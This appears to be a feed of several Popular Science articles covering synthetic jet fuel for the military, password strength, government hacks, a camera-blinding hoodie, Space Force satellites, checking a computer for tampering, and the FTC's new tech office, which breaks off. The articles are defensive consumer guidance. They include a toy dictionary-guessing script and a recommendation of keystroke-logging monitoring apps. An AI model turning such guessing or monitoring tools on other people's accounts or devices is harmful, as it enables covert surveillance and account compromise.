But fuel requires carbon, too, so the company needs carbon dioxide to get that element. “For Project SynCE specifically, we’re looking at on-site direct-air capture, or direct ocean-capture technologies,” he says. But more generally, he adds, “We capture carbon dioxide from a variety of sources.” Currently, he notes, their source is CO2 “that was a byproduct of biofuel production.” 

So the recipe’s ingredients call for carbon dioxide, plus the hydrogen that came from water. Those elements are combined in a fixed bed flow reactor, which is “a fancy way of saying a bunch of tubes with catalysts,” or, even more simply, “tubes with rocks in them,” Sheehan says. 
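Air Company has not published the details of its catalysis, but the overall chemistry can be sketched in two generic steps: water electrolysis to produce hydrogen, followed by Fischer-Tropsch-type hydrogenation of carbon dioxide into paraffin building blocks. The balanced equations below are a simplified sketch of that general route, not the company's disclosed process:

```latex
% Step 1: electrolysis of water, powered by renewable electricity
2\,\mathrm{H_2O} \longrightarrow 2\,\mathrm{H_2} + \mathrm{O_2}

% Step 2: hydrogenation of CO2 into paraffin building blocks (-CH2- units)
n\,\mathrm{CO_2} + 3n\,\mathrm{H_2} \longrightarrow (\mathrm{CH_2})_n + 2n\,\mathrm{H_2O}
```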

[Related: Sustainable jet fuel is taking off with commercial airlines]

Jet fuel itself primarily consists of molecules—known as paraffins—made of carbon and hydrogen. For example, some of those paraffins are called normal paraffins, which is a straight line of carbons with hydrogens attached to them. There are also hydrocarbons present called aromatic compounds. 

“You need to have those aromatic compounds in order to make a jet fuel that’s identical to what you get from fossil fuels,” he says, “and it’s very important to be identical to what you get from fossil fuels, because all of the engines are designed to run on what you get from fossil fuels.”  

Okay, enough chemistry. The point is that this fuel is synthetically made, didn’t come out of the ground, and can be a direct substitute for the refined dinosaur juice typically used in aircraft. “You can actually make jet fuel with our process that burns cleaner as well, so it has fewer contrails,” he says. It will still emit carbon when burned, though.

Why the Department of Defense is interested 

This project involves a few government entities, including the Air Force and the Defense Innovation Unit, which acts as a kind of bridge between the military and the commercial sector. So where will they start cooking up this new fuel? “We plan to pair this technology with the other renewable energy projects at several joint bases, which include solar, geothermal, and nuclear,” says Jack Ryan, a project manager for the DIU, via email. “While we can’t share exact locations yet, this project will initially be based in the Continental US and then over time, we expect the decreasing size of the machinery will allow for the system to be modularized and used in operational settings.” 

Having a way to produce fuel in an operational setting, as Ryan describes it, could be helpful in a future conflict, because ground vehicles like tanker trucks can be targets. For example, on April 9, 2004, in Iraq, an attack known as the Good Friday Ambush resulted in multiple deaths; a large US convoy was carrying out an “emergency delivery of jet fuel to the airport” in Baghdad, Iraq, as The Los Angeles Times noted in a lengthy article on the incident in 2007. 

“By developing and deploying on-site fuel production technology, our Joint Force will be more resilient and sustainable,” Ryan says.

[Related: All your burning questions about sustainable aviation fuel, answered]

Nikita Pavlenko, a program lead at the International Council on Clean Transportation, a nonprofit organization, says that he is excited about the news. “It’s also likely something that’s still quite a ways away,” he adds. “Air Company is still in the very, very initial stages of commercialization.” 

These types of fuels, called e-fuels, for electrofuels, don’t come in large amounts, nor cheaply. “I expect that the economics and the availability are going to be big constraints,” he says. “Just based off the underlying costs of green hydrogen [and] CO2, you’re probably going to end up with something much more expensive than conventional fuel.” In terms of how much fuel they’ll be able to make synthetically, Ryan, of the DIU, says, “It will be smaller quantities to begin with, providing resiliency to existing fuel supply and base microgrids,” and then will grow from there. 

[Related: Airbus just flew its biggest plane yet using sustainable aviation fuel]

But these types of fuels do carry environmental benefits, Pavlenko says, although it’s important that the hydrogen they use is created through green means—from renewable energy, for example. The fuel still emits carbon when burned, but the benefits come because the fuel was created by taking carbon dioxide out of the atmosphere in the first place, or preventing it from leaving a smokestack. Even that smokestack scenario is environmentally appealing to Pavlenko, because “you’re just kind of borrowing that CO2 from the atmosphere—just delaying before it goes out in the atmosphere, rather than taking something that’s been underground for millions of years and releasing it.” (One caveat is down the line, there ideally aren’t smokestacks belching carbon dioxide that could be captured in the first place.) 

For its part, the Defense Innovation Unit says that they’re interested in multiple different ways of obtaining the carbon dioxide, but are most enthused about getting it from the air or ocean. That’s because those two methods “serve the dual purpose of drawing down CO2 from the air/water while also providing a feedstock to the synthetic fuel process,” says Matt Palumbo, a project manager with the DIU, via email. Palumbo also notes that he expects this period of the contract to last about two to five years, and thinks the endeavor will continue from there.

The Opt-Out: Stop choosing bad passwords already https://www.popsci.com/diy/best-passwords/ Thu, 02 Mar 2023 14:00:00 +0000 https://www.popsci.com/?p=516469
Red strength test with different tiers of password security against a cyan background.
Step right up! Test how secure your passwords are. Lauren Pusateri

Please secure your accounts properly. We’re begging you.

The post The Opt-Out: Stop choosing bad passwords already appeared first on Popular Science.


Your passwords are probably terrible and you need to make them stronger. Yes, we know there are few things more annoying than brainstorming a fresh credential every time you need to do the tiniest task, but they’re one of the most practical ways to keep hackers and other malicious actors out of your business.

Tech companies, journalists, and organizations concerned with cybersecurity awareness have spent years underscoring the importance of secure passwords. Sadly, it seems there has been little payoff. A 2022 report by credential manager NordPass is truly embarrassing, listing “password,” “123456,” and “123456789” as the three most common passwords. It doesn’t get much better than that as you go further down, either: “Password1” ranks at No. 192.

It’s worth noting that the tech industry has spent decades imagining a password-free world, and some companies are already offering options to circumvent or ditch this type of authentication altogether. But as long as passwords remain the primary way to access our data, we’ll need to up our game to properly protect our information and money.

What is a strong password, and why is it so hard to create one?

In their attempts to gain access to your accounts, malicious third parties might try to use methods like guessing attacks. There are several variations to this approach, but they all work in a similar way: grabbing a key (a known common password or a personal credential leaked online) and seeing how many doors it will open.

[Related: Why government agencies keep getting hacked]

Of course, attackers aim for efficiency, so they’re not manually typing on a laptop somewhere. They’re using software to automatically try every entry in a common password dictionary, for example, or using information from known data breaches to try leaked passwords and/or their potential iterations. This is because people don’t update their passwords as regularly as they should (they do it once or twice a year instead of the recommended every three months), and when they do, they tend to make only minor changes to the ones they already have.
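To see why minor changes don't help, here's a minimal sketch of how an automated guessing attack works. The word list and mutation rules are illustrative, not taken from any real cracking tool, which would try millions of words and far more variants:

```python
# Illustrative only: a tiny dictionary attack with trivial mutations.
COMMON_PASSWORDS = ["password", "123456", "123456789", "qwerty", "letmein"]

def trivial_variants(word):
    """Yield the kinds of simple edits cracking software tries automatically."""
    yield word
    yield word.capitalize()
    yield word + "1"
    yield word + "!"
    yield word.capitalize() + "1"
    yield word.replace("a", "4").replace("o", "0")

def is_easily_guessed(candidate):
    """True if the candidate is a common password or a trivial variant of one."""
    return any(
        candidate == variant
        for word in COMMON_PASSWORDS
        for variant in trivial_variants(word)
    )

print(is_easily_guessed("Password1"))  # True: capitalized "password" plus a digit
print(is_easily_guessed("tundra-Mural-Kettle9"))  # False: not derived from the list
```

Even this toy version catches "Password1" instantly, which is exactly why swapping a letter or tacking on a digit isn't a real update.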

This is why strong passwords are unique, long, and peppered with special characters like punctuation marks, numbers, and uppercase letters. When we say unique, we mean words you can’t find in the dictionary. Common or famous names are out too—the more original the password, the better. The length of a password and the use of special characters both increase the odds that it is truly unique. It’s just math—the greater the number and variety of characters you use in your credentials, the more possible combinations there are, and the harder they will be to guess. 
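The math above can be made concrete with a quick back-of-the-envelope calculation. The character-set sizes are assumptions for illustration (26 lowercase letters; roughly 94 printable ASCII characters for a password mixing cases, digits, and punctuation):

```python
import math

def search_space(charset_size, length):
    """Total number of possible passwords of a given length."""
    return charset_size ** length

def entropy_bits(charset_size, length):
    """Password entropy in bits: log2 of the search space."""
    return length * math.log2(charset_size)

print(round(entropy_bits(26, 8), 1))   # 8 lowercase letters: ~37.6 bits
print(round(entropy_bits(94, 12), 1))  # 12 mixed characters: ~78.7 bits
# Each added bit doubles the work a guessing attack needs, so the
# 12-character mixed password is roughly a trillion times harder to guess.
```

Adding four characters and widening the alphabet buys about 41 extra bits, which is the difference between a crackable password and an impractical one.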

A lot of people come up with their own secret code to develop passwords using easy-to-remember phrases from songs, poems, and movies. A classic approach is to replace letters with numbers (like 4s for A’s and 0s for O’s) and alternate uppercase and lowercase letters. If this is what you do, you’re on the right track, but you actually need to make your personal cryptography even more complicated to truly add security to your passwords. We won’t tell you how we encrypt our credentials, but you can create your own written language or alphabet by replacing letters with other characters. Just keep in mind that Klingon was built from utter gibberish, so the sky is the limit.   

Naturally, the cost of added difficulty is a higher cognitive burden. This means that the further a password is from a word or phrase you commonly use, the harder it’ll be for you to remember. That’s complicated as it is, but if you consider that the average person has around 100 online accounts, the feasibility of remembering all of those encoded unique passwords goes violently out the window.  

Help us help you

Password managers. That’s it, you think, that’s the solution. Theoretically, it is. These stand-alone apps, downloadable extensions, and built-in browser utilities have three main abilities: suggesting strong passwords, storing them securely, and remembering them whenever you visit a website where you have an account. 

Basically, these tools allow us to outsource the whole credentials problem out of our lives, on the condition that we remember one good master password—or hold another type of authentication key, such as a fingerprint. And it works. Depending on the password manager you get, you’ll find features like good design, syncing across devices, and the ability to choose when fields autofill. 

But password managers are not perfect, and what makes them convenient also makes them incredibly attractive targets for hackers. After all, the proverbial basket that holds all your cybersecurity eggs is a great deal: Creeps can crack one account and take all your credentials for free. Companies like NordPass, KeePass, 1Password, and others have taken extra precautions to secure their apps, incorporating features like constant logouts and unique single-use codes in case you lose access to your account. 

[Related: How to get started using a password manager]

Still, sometimes these measures are not enough. In December 2022, LastPass, another popular password manager, reported a security breach that included users’ names, phone numbers, emails, and billing information. As if this weren’t concerning enough, the company’s crisis management at the time was lacking, and it only disclosed details about the breach and what steps customers should follow in a blog post published more than two months later.

Beyond breaches, some features in password managers are generally less than secure. In a 2020 review, researchers from the User Lab at the University of Tennessee, Knoxville, mentioned autofill as one of the most concerning. This is especially true when password managers automatically enter credentials without any input from the user. In cross-site scripting (XSS) attacks, hackers inject malicious scripts into a website’s code to steal a password as soon as the right fields are populated. “If a password manager autofills passwords without first prompting the user, then the user’s password will be surreptitiously stolen simply by visiting the compromised website,” explain study authors Sean Oesch and Scott Ruoti.

The likelihood of a successful XSS attack varies depending on factors like whether the site is using a secure connection (HTTPS, for example). But it’s always best to opt for a password manager that either requires user interaction for autofill or allows you to manually disable the feature. Most browser-based password managers don’t require user interaction before filling in credentials, but there are some exceptions. Mozilla Firefox automatically populates fields by default, but you can turn this feature off by clicking the main menu (three lines), going to Settings, Privacy & Security, and scrolling down to Logins and Passwords. Once you’re there, uncheck the box next to Autofill logins and passwords. An even easier solution is to use Apple’s Safari, which always requires user input for autofill. If you’re on a PC or don’t want to switch browsers, the study found the browser extension of the popular 1Password app will also require a click before it reveals your information. 

Drink water, wear sunscreen, and enable multifactor authentication

Healthy habits lead to better lives, and when it comes to your life online, using multifactor authentication is truly self-care. 

This now practically ubiquitous feature is an extra layer of security that prevents virtual sneaks from accessing your accounts even when they have the right credentials. This means that even if your passwords leak all over the internet, people won’t be able to use them if they don’t have an extra form of verification like a text sent directly to your phone, an app-generated code, a prompt on another device, or a biometric element such as your fingerprint or face. 

Which and how many of these you use will depend on the level of security you want your account to have and what is most practical for you. Keep in mind that the more methods you enable, the more ways there will be to access your account. That’s not exceptionally secure, but it might make sense if you, say, regularly lose your phone or get locked out of your accounts. 

[Related: How to keep using two-factor authentication on Twitter for free]

Just know that even though most modern platforms offer some kind of multifactor authentication, you won’t find every type every time. The most common option is authentication via a code sent over SMS text, followed closely by authentication via a code-generating app. These are essentially the same, but the latter method uses the internet instead of phone networks to deliver the code. It’s worth noting that text messages traveling through the electromagnetic spectrum can be intercepted, and according to Ruoti, the low standards US telecom companies use when authenticating users make it possible to port someone’s phone number to a SIM card and receive their authentication codes on your device. If this concerns you, you can opt for more sophisticated alternatives, like security keys. These work exactly like your home keys—just plug them into your gadget’s USB port when prompted, and you’re done. We have an entire guide solely dedicated to helping you choose the best multifactor authentication method for you, if you want to do a deep dive into your options.

But even if some approaches are better than others, one thing will always be true: Any multifactor authentication is better than none at all. So if you have a phone, it’s an excellent idea to set up SMS codes for whenever a new device tries to access your account. Just make sure to disable the ability to preview message content on your lock screen, or somebody could use your codes by just stealing your phone. On Android, you can do this by going to Settings, Notifications, and turning off Sensitive notifications under Privacy. On iOS, open Settings, go to Notifications, tap Show Previews, and choose Never. If you want to see previews for less sensitive notifications on your iPhone, you can turn off previews for individual apps instead. If you receive codes via the Messages app, for example, open Settings, go to Notifications, tap Messages, find Show Previews, and choose Never.  

May this be the sign you were waiting for to get your act together when it comes to online security. Don’t wait until spring cleaning; don’t wait until it’s time to make New Year’s resolutions—do it now. Keep your credentials off 2023’s list of worst passwords. That’s a list you don’t want to make. 

Now off you go to change those passwords. We’re glad we had this talk. 

The post The Opt-Out: Stop choosing bad passwords already appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Why government agencies keep getting hacked https://www.popsci.com/technology/us-government-agencies-hacking-history/ Wed, 01 Mar 2023 20:00:00 +0000 https://www.popsci.com/?p=516121
Cyber security concept, man hand protection network with lock icon and virtual screen on smartphone.
Cybersecurity appears to be an ongoing issue for government agencies. DEPOSIT PHOTOS

The most recent incident involves a division of the Justice Department.

The post Why government agencies keep getting hacked appeared first on Popular Science.

]]>
Cyber security concept, man hand protection network with lock icon and virtual screen on smartphone.
Cybersecurity appears to be an ongoing issue for government agencies. DEPOSIT PHOTOS

The US Marshals Service, a division of the Justice Department, was hacked last month. According to the New York Times, the hackers stole “a trove of personal information about investigative targets and agency employees.” It’s not a good look for the department tasked with protecting judges, transporting federal prisoners, and managing witness protection. (Fortunately, the latter database wasn’t stolen in the hack.)

According to Justice Department officials, the breach happened on February 17 and was done using ransomware. This information is a bit vague from a security perspective, but suggests that a ransomware tool was used to steal data from the US Marshals’ computer system in order to extort a payout in return for not releasing the information. This is different from another kind of common ransomware attack where the target’s computer is encrypted so they can’t use it, or a straight-up hack where the bad actor just steals whatever they can in order to sell it or use it for international espionage. It’s not yet clear whether the Justice Department intends to pay the hackers off, or if the stolen data—including “sensitive law enforcement information”—has been leaked on the dark web. 

The Marshals are far from the first US government organization to suffer a security breach. Last year, at least six state governments were targeted by Chinese hackers. In 2020, a Russian intelligence agency hacked the State Department, the Department of Homeland Security, parts of the Pentagon, and dozens more federal agencies by exploiting a vulnerability in software made by SolarWinds. And local governments are frequently targeted too. Last month, the City of Oakland had to declare a state of emergency after a ransomware attack forced it to take all its IT systems offline. The Center for Strategic and International Studies keeps a list of significant cyber incidents, and there are major attacks on government agencies around the world basically every month. 

[Related: Cybersecurity experts say $2 billion is too little, too late]

It’s an issue that the government is aware of, and claims to be actively working to fix. In 2021, a federal cybersecurity evaluation found that almost all of the agencies reviewed did not meet the standards for keeping the data they store safe. Aging computer systems and outdated code are problems that come up over and over again. Since then, there have reportedly been efforts made to reorganize cybersecurity infrastructure, develop guidelines, and implement best practices.

So what makes government agencies such tempting targets to hackers? Well, let’s leave aside the espionage angle, where adversarial governments attempt to steal state secrets, shut down nuclear programs, and generally just go all John le Carré. Their motivations are fairly self-explanatory. For hackers looking to make a quick buck there are a number of reasons government agencies can be a lucrative option. 

According to a report by Sophos, local governments are often targeted because they have weak defenses, low IT budgets, and limited IT staff. In other words, they’re often overstretched compared to the private sector, so hackers are likely to have an easier time installing ransomware. For larger government departments, presumably including the US Marshals, the appeal is their access to public funds. It makes them seem a lucrative target, whether or not the hackers are able to actually extract a payment.

Cybersecurity has been a priority for the Biden administration, but it’s clear that there is still a long way to go before ransomware attacks like these are no longer an issue for government organizations. The reality is that a single weak link, phishing attack, or vulnerable computer can offer hackers a way in—and keeping ahead of them is a nearly impossible task.

The post Why government agencies keep getting hacked appeared first on Popular Science.


]]>
A simple DIY hoodie can fool security cameras https://www.popsci.com/technology/camera-shy-hoodie-privacy/ Mon, 27 Feb 2023 18:00:00 +0000 https://www.popsci.com/?p=515573
Side-by-side of man wearing black hoodie and surveillance camera footage of him walking with LED lights blinding face
Mac Pierce's 'Camera Shy Hoodie' uses infrared LEDs to obscure wearers' faces in security camera footage. Mac Pierce/Creative Commons

The 'Camera Shy Hoodie' looks innocuous, but keeps your face invisible to surveillance.

The post A simple DIY hoodie can fool security cameras appeared first on Popular Science.

]]>
Side-by-side of man wearing black hoodie and surveillance camera footage of him walking with LED lights blinding face
Mac Pierce's 'Camera Shy Hoodie' uses infrared LEDs to obscure wearers' faces in security camera footage. Mac Pierce/Creative Commons


Despite objections from privacy advocates and many everyday citizens, surveillance technology such as facial recognition AI is appearing more and more in modern life. The market is booming—by 2026, the surveillance tech market is projected to exceed $200 billion, up from less than half that size in 2020. New products designed to collect personal data and track physical movements will likely keep popping up until meaningful legislation or public pushback causes companies to slow their roll. And that’s where people like Mac Pierce enter the picture. 

Pierce, an artist whose work critically engages with weaponized emerging technologies, recently unveiled their latest ingenious project—an everyday hoodie retrofitted to include an array of infrared (IR) LEDs that, when activated, blinds any nearby night-vision security cameras. Using mostly off-the-shelf components like LumiLED lights, an Adafruit microcontroller, and silicone wire, as well as software Pierce made open-source for interested DIYers, the privacy-boosting “Camera Shy Hoodie” is designed to let citizens safely engage in civic protests and demonstrations. Or wearers can simply opt out of being tracked by unknown third parties while walking down the street.

[Related: Police are paying for AI to analyze body cam audio for ‘professionalism’.]

Although unnoticeable to human eyes, the garment’s infrared additions wreak havoc on surveillance cameras that utilize that light spectrum to see in evening darkness. Emitting flashing infrared bursts from the hoodie forces nearby cameras’ auto exposure to try to correct for the brightness, obscuring the wearer’s face in a bright, pulsating light.

Speaking with Motherboard on Monday, Pierce argued, “surveillance technology has gotten to such a point where it’s so powerful and so pervasive. And it’s only now that we’re realizing, ‘Maybe we don’t want this stuff to be as powerful as it is.’” Projects like the Camera Shy Hoodie—alongside Pierce’s earlier, simplified “Opt Out Cap”—are meant to simultaneously bring attention to the issues of privacy and authority, while also providing creative workarounds to everyday, frequently problematic surveillance tools, he says.

[Related: The DOJ is investigating an AI tool that could be hurting families in Pennsylvania.]

Pierce has made all the designs, plans, and specifications for their hoodie hack available for free on their website. Unfortunately, the project isn’t cheap—all told, the work would set makers back around $200—but anyone interested in a Camera Shy Hoodie to call their own can also sign up to be notified by Pierce when custom kits are available for purchase.

Meanwhile, there are a number of interesting (and cheaper) clothing options in the vein of Pierce’s Camera Shy Hoodie, including an apparel line meant to confuse license plate scanning traffic cameras, and facial recognition-obscuring makeup techniques.

The post A simple DIY hoodie can fool security cameras appeared first on Popular Science.


]]>
Why the Space Force is testing out tech for small, high-flying satellites https://www.popsci.com/technology/space-force-astranis-satellites/ Mon, 27 Feb 2023 12:00:00 +0000 https://www.popsci.com/?p=515386
An Astranis satellite.
An Astranis satellite. Astranis

A recent contract is worth more than $10 million and involves a secure communications technique.

The post Why the Space Force is testing out tech for small, high-flying satellites appeared first on Popular Science.

]]>
An Astranis satellite.
An Astranis satellite. Astranis

On February 14, geostationary communications satellite company Astranis announced that it had been awarded a contract with the US Space Force worth over $10 million. The contract is to first demonstrate a secure comms technique on the satellite hardware in a terrestrial test setting, and also includes the possibility of testing it in space.

Space remains a useful place for countries to place sensors that look down on other nations. Many of these satellites reside in low Earth orbit, up to roughly 1,200 miles above the surface, which is easier for satellites to reach and lets satellites circle the globe rapidly. Geostationary orbit, which is about 22,200 miles above ground, is harder to get to. Plus, satellites at all altitudes risk having signals jammed, or being disrupted by other objects in orbit, which has led the US military to pursue satellite constellations, or formations of smaller satellites, as a way to ensure that some functionality persists in the event of attack or disaster. 

“We build small satellites for higher orbits, starting with geostationary orbit, which is quite a higher orbit,” says Astranis co-founder and CEO John Gedmark. “It’s the special orbit where you can park a single satellite over a part of the world or over a country and provide continuous service with just that one satellite.”

Over Alaska and Peru

Geostationary satellites have been used to provide communications and television broadcasts, and Astranis’ primary aim for both commercial and military customers is to use smaller geostationary satellites to provide continuous broadband-level internet connections. For two demonstrations of commercial uses, Gedmark points to upcoming launches placing satellites above Alaska (scheduled for early April), and one later this year that will put a satellite above Peru.

“This is a satellite that’ll go up over Peru and also provide some coverage in Ecuador. We will basically allow them to go and deploy and upgrade a number of cell towers out in some of the most remote parts of the country,” said Gedmark. “There’s a lot of parts of Peru where the terrain is just super rough and pretty extreme in the jungles, they have Andes mountains, they have a lot of things that make it very hard to get connectivity out to some of these remote areas.”

In both these places, the satellites will augment existing telecommunications infrastructure on the ground, letting remote towers connect through space instead of over land. Peru, like Alaska, contains vast stretches of varying terrain, where infrastructure such as wires, cables, or fiber internet connections can be hard to place. Freestanding cell phone towers can be set up, powered locally, and then route their communications through satellites instead of over-land wires, bringing 3G and 4G levels of internet to places people could not previously access it.

For military use

Those same traits, for connecting local rural infrastructure to wider data networks through space, are part of what makes Astranis satellites so appealing to the military.

“We realized that the military has this real problem right now for milsatcom and for some other capabilities around resiliency, right? They are really dependent on a small handful of these giant geo satellites, some of which cost billions of dollars. And those satellites are, as we like to quote General Hyten on this, big fat and juicy targets,” said Gedmark.

In 2017, Air Force General John Hyten was the head of US Strategic Command, and announced that he would no longer “support the development any further of large, big, fat, juicy targets,” referring to those types of satellites. Hyten retired in 2021, but the Department of Defense has continued to push for smaller satellites to fill the skies, as a more resilient option than the all-in-one massive satellites of the present. Many of these constellations are aimed at low Earth orbit.

“Without getting into specific pricing, we could put up about a dozen or more of our satellites for the cost of one of the big ones,” says Gedmark. Since 2018, Astranis has attracted venture funding on the premise of putting satellites into geostationary orbit.

“It’s hard to design all the electronics for the harsh radiation environment of geo, you’re right in the thick of the Van Allen belts,” says Gedmark. The Van Allen belts contain charged particles that can damage satellites, so anything built to survive has to endure the heavy ion strikes and radiation dosages inherent to the region. “These higher orbits are harder to get to, so you have to solve that with some clever onboard propulsion strategies. We solve that by having an electric propulsion system, and having an ion thruster on board.”

When launched, the satellites are aimed towards geostationary orbit, and then use their own power to reach and maneuver in space. Gedmark says the satellites are designed to stay in geostationary orbit for between 8 and 10 years, with the ability to relocate up to 30 times in that period.

The speed at which the satellites can be maneuvered from one orbit to another depends on how much fuel the satellite operators are willing to expend, with repositioning possible in days, though Gedmark expects moving to a new location in weeks will be the more typical use case. 

Once in orbit, the satellites need to communicate securely. The Protected Tactical Waveform is a communications protocol and technique developed by the US military, which Astranis aims to demonstrate can be run on the software-defined radio of its satellites. (A software-defined radio is a computer that can change its parameters for transmitting and receiving information with code, while a more traditional radio requires analog hardware, like modulators and amplifiers, to encode and decode information from radio signals.) 

The Protected Tactical Waveform is “a set of techniques that are programmed into the radio so it can automatically avoid jamming and interference,” says Gedmark. “We’re gonna start by doing that as a demo in our lab, and then with the future satellites do that as an on orbit demo.”

Because this protocol will run on a software-defined radio, rather than on hardware whose function is fixed once launched, Astranis could likely adapt existing commercial satellites to carry the Protected Tactical Waveform while they remain in orbit, facilitating surge communications as events arise and military needs demand.

For now, the promise is that private investment in communication tech can yield a tool useful both for expanding internet connectivity across the globe, and for providing communications to US military forces in the field faster than it would take to set up ground-based infrastructure. For the Space Force, which is tasked with ensuring reliable communications across the heavens, more durable satellites that can be maneuvered as needed would allow it to redeploy assets across the skies to win wars on Earth.  

The post Why the Space Force is testing out tech for small, high-flying satellites appeared first on Popular Science.


]]>
How to check if your computer has been tampered with https://www.popsci.com/computer-tampering-security-guide/ Sun, 12 Dec 2021 17:40:29 +0000 https://www.popsci.com/uncategorized/computer-tampering-security-guide/
A man wearing sunglasses and a blue plaid shirt sitting in a dark room using an Apple Macbook laptop.
Everyone knows sunglasses are much more practical than a full Guy Fawkes mask when you're hacking. NeONBRAND / Unsplash

There are some easy ways to tell if someone has been using your computer.

The post How to check if your computer has been tampered with appeared first on Popular Science.

]]>
A man wearing sunglasses and a blue plaid shirt sitting in a dark room using an Apple Macbook laptop.
Everyone knows sunglasses are much more practical than a full Guy Fawkes mask when you're hacking. NeONBRAND / Unsplash

Whether you’re in an open office where colleagues regularly wander past, or live somewhere—like a college dorm—where you feel comfortable leaving your laptop unattended in the presence of relative strangers, it can be all too easy for someone else to sneak a look at your computer.

If you want to keep your device secure in communal environments, your best bet is to stop unauthorized access in the first place. Still, there’s some detective work you can do if you suspect someone else has been using your device.

Always make sure you lock your computer

Since prevention is better than a cure, you ideally want to prevent others from accessing your laptop in the first place. A simple way to do that is to lock your laptop behind a password whenever you step away from it.

On macOS, you can get back to the lock screen at any point by opening the Apple menu and choosing Lock Screen, or hitting the keyboard shortcut Ctrl+Cmd+Q. It’s straightforward on Windows, too. From the Start menu, click your avatar, then choose Lock. Alternatively, the Win+L keyboard shortcut works as well.

[Related: How to remove Bing results from your Windows Start menu]

If you keep leaving your desk in a hurry or just always forget to lock your computer when you step away from it, set your laptop to lock itself after a certain amount of idle time. On macOS, open the Apple menu and pick System Settings, then scroll down to Lock Screen. Find the option to Require password after screen saver begins or display is turned off, and use the dropdown menu to choose exactly when your computer will lock itself after it’s been idle. You can use the options and dropdown menus right above this to change the time it takes for a screen saver to appear or the display to turn off.

To automatically lock Windows 11, click the Start menu, then the cog icon to open your settings. Then go to Accounts > Sign-in options and find the Additional settings heading. Click the dropdown menu next to If you’ve been away, when should Windows require you to sign in again? and choose When PC wakes up from sleep. To set when your computer should start snoozing, choose System from settings, then Power & battery, and click Screen and sleep to adjust the various options to your liking.

On Windows 10, open the Start menu and hit the cog icon to access your settings. From there, go to Accounts > Sign-in options and make sure the Require sign-in option is set to When PC wakes up from sleep. To set idle time duration, go to your settings and pick System, followed by Power & sleep.

The duration of your PC’s various sleep and idle options is up to you—a shorter time is better for security and battery life, but also means your computer might lock itself while you’re still in front of it if you haven’t touched the keyboard or mouse for a few minutes. Start with something around five minutes, and adjust it if you feel that time is too short.

Check for recent activity

Let’s say you suspect someone might have been able to access your laptop while it was unlocked, or maybe even knows your password. Your next step should be to check for telltale signs of unusual activity inside the most commonly used apps.

Start with your web browser and call up the browsing history to see if someone else has left a trace. From the Chrome menu (three vertical dots in the top right corner of your browser), go to History, then History again; from the Firefox menu (three lines), choose History, then Manage history; from the Microsoft Edge menu (three dots), choose History, then either All to view recent pages in a dropdown menu or the three dots in the top right of that menu followed by Open history page; and from the Safari toolbar on macOS, choose History, then Show All History.

Most programs on your computer have some kind of history or recent files list. In Microsoft Word, for example, click File, Open, then Recent. In Adobe Photoshop, you can choose File and Open Recent. Whatever the applications on your system, you should be able to find similar options.

If you’re not sure what program a would-be laptop infiltrator might have used, check the file system—your intruder might have left something behind on the desktop or in your computer’s download folder, but you can dig deeper, too. On macOS, open Finder from the dock, then switch to the Recents tab to see all the files that have been edited lately. There’s a similar screen on Windows too, accessible by opening File Explorer and clicking Quick Access (this may appear by default).
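If you’d rather script that sweep than click through Finder or File Explorer, the same check is a few lines of cross-platform Python. This is just a sketch—the `recently_modified` helper and the Downloads path are illustrative assumptions, not a built-in utility:

```python
import time
from pathlib import Path

def recently_modified(folder: str, hours: float = 24) -> list[Path]:
    """Return files under `folder` modified within the last `hours`, newest first."""
    cutoff = time.time() - hours * 3600
    hits = [p for p in Path(folder).rglob("*")
            if p.is_file() and p.stat().st_mtime >= cutoff]
    return sorted(hits, key=lambda p: p.stat().st_mtime, reverse=True)

# Example: anything touched in your Downloads folder over the past day.
downloads = Path.home() / "Downloads"
if downloads.exists():
    for path in recently_modified(str(downloads)):
        print(path)
```

Point it at your desktop, documents, or any other folder a snooper might have used; a modification timestamp from a time you weren’t at the keyboard is worth a closer look.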

Finder window on macOS showing recent image files.
Finder can show you all the files that have been worked on recently in macOS—a good way to check if your computer has been tampered with. David Nield

If you’re still using Windows 10, you’ve got another screen you can check: the timeline. Click the Task View icon on the taskbar, which looks like two stacked rectangles with a scroll bar to their right. If you don’t see it, right-click your taskbar and choose Show Task View button. Scroll down your timeline to find any files that have been opened, websites that have been viewed, and Cortana commands that have been run. The Task View still exists on Windows 11, but it functions differently, and there’s no timeline.

You can dig into absolutely everything that’s happened on your laptop or desktop recently, but the utilities involved are quite difficult to decipher. You might have to run a few web searches to make sense of the information they provide. The utilities will also log all system actions, including those taken by the computer itself. Just because you see activity at a time you weren’t around doesn’t mean someone tampered with your device—it could have run a task itself.

[Related: Set your computer to turn on and off on a schedule]

On macOS, you can do so with the Console—find it by opening Spotlight (Cmd+Space) then typing “console” into the box. If you don’t see anything, you’ll have to click Start streaming to begin viewing system log messages, but this may slow down your computer. These logs will give you a comprehensive list of everything happening on your computer, and you can narrow down the entries via the Search box. Type “wake up” into the box to see all the times your Mac has woken up from sleep, for example.

Over on Windows, you have Event Viewer—look for it in the taskbar search box. Again, it’ll provide you with a mass of information, presented in mostly technical language. Click the right-pointing arrow next to Windows Logs to view a number of subcategories, then right-click System. Choose Filter Current Log, find the Event sources dropdown menu, select Power-Troubleshooter, and click OK. This should present you with a list of all the times your laptop woke up.

Get some extra help from apps

Realtime Spy app window
Spytech Realtime-Spy will keep an eye on your laptop in your absence. David Nield

If you’re serious about catching laptop snoopers in the act, some third-party software might be in order. One of the best we’ve come across is Spytech Realtime-Spy, which works for Windows or macOS through a simple web interface. You can test out a demo version online, too.

The program shows you the apps that have been used, the websites that have been visited, and the connections that have been made on your computer. It will even take screenshots and record individual key presses. It’s a comprehensive package but will set you back $80 per year.

Another option is Refog, which concentrates mainly on logging keystrokes on your laptop’s keyboard, but which also monitors web usage and takes screenshots. The software costs about $30 per month for Windows or macOS, but there’s a free trial if you want to test it first.

While these programs can alert you to potential snoopers, they can also be used to spy on other people. Of course, we’d strongly advise against doing this. Otherwise, you’re the creep.

This story has been updated. It was originally published on July 20, 2019.

The post How to check if your computer has been tampered with appeared first on Popular Science.


]]>
The FTC is trying to get more tech-savvy https://www.popsci.com/technology/ftc-office-of-technology/ Sat, 25 Feb 2023 12:00:00 +0000 https://www.popsci.com/?p=515353
the FTC
The Federal Trade Commission. PAUL J. RICHARDS/AFP via Getty Images

The agency is beefing up its tech team and forming an Office of Technology. Here's what the new department will do.

The post The FTC is trying to get more tech-savvy appeared first on Popular Science.

]]>
the FTC
The Federal Trade Commission. PAUL J. RICHARDS/AFP via Getty Images

The Federal Trade Commission, or FTC, is bulking up its internal tech team. The agency, which focuses on consumer protection and antitrust issues in the US, announced last week that it would be forming an Office of Technology and hiring more tech experts. 

